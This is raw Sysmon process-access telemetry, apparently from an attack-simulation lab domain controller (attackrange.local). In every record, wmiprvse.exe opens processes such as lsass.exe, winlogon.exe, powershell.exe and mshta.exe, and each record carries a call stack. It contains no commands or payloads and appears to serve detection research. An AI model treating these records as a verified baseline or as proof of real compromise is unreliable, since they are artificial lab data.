15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027468Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027467Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027466Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536E-6008-7606-00000000A301}5468C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027465Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027464Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027463Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027462Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027461Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027460Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027459Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027458Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027457Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027456Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027455Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027454Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027453Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027452Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027451Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027450Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027449Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 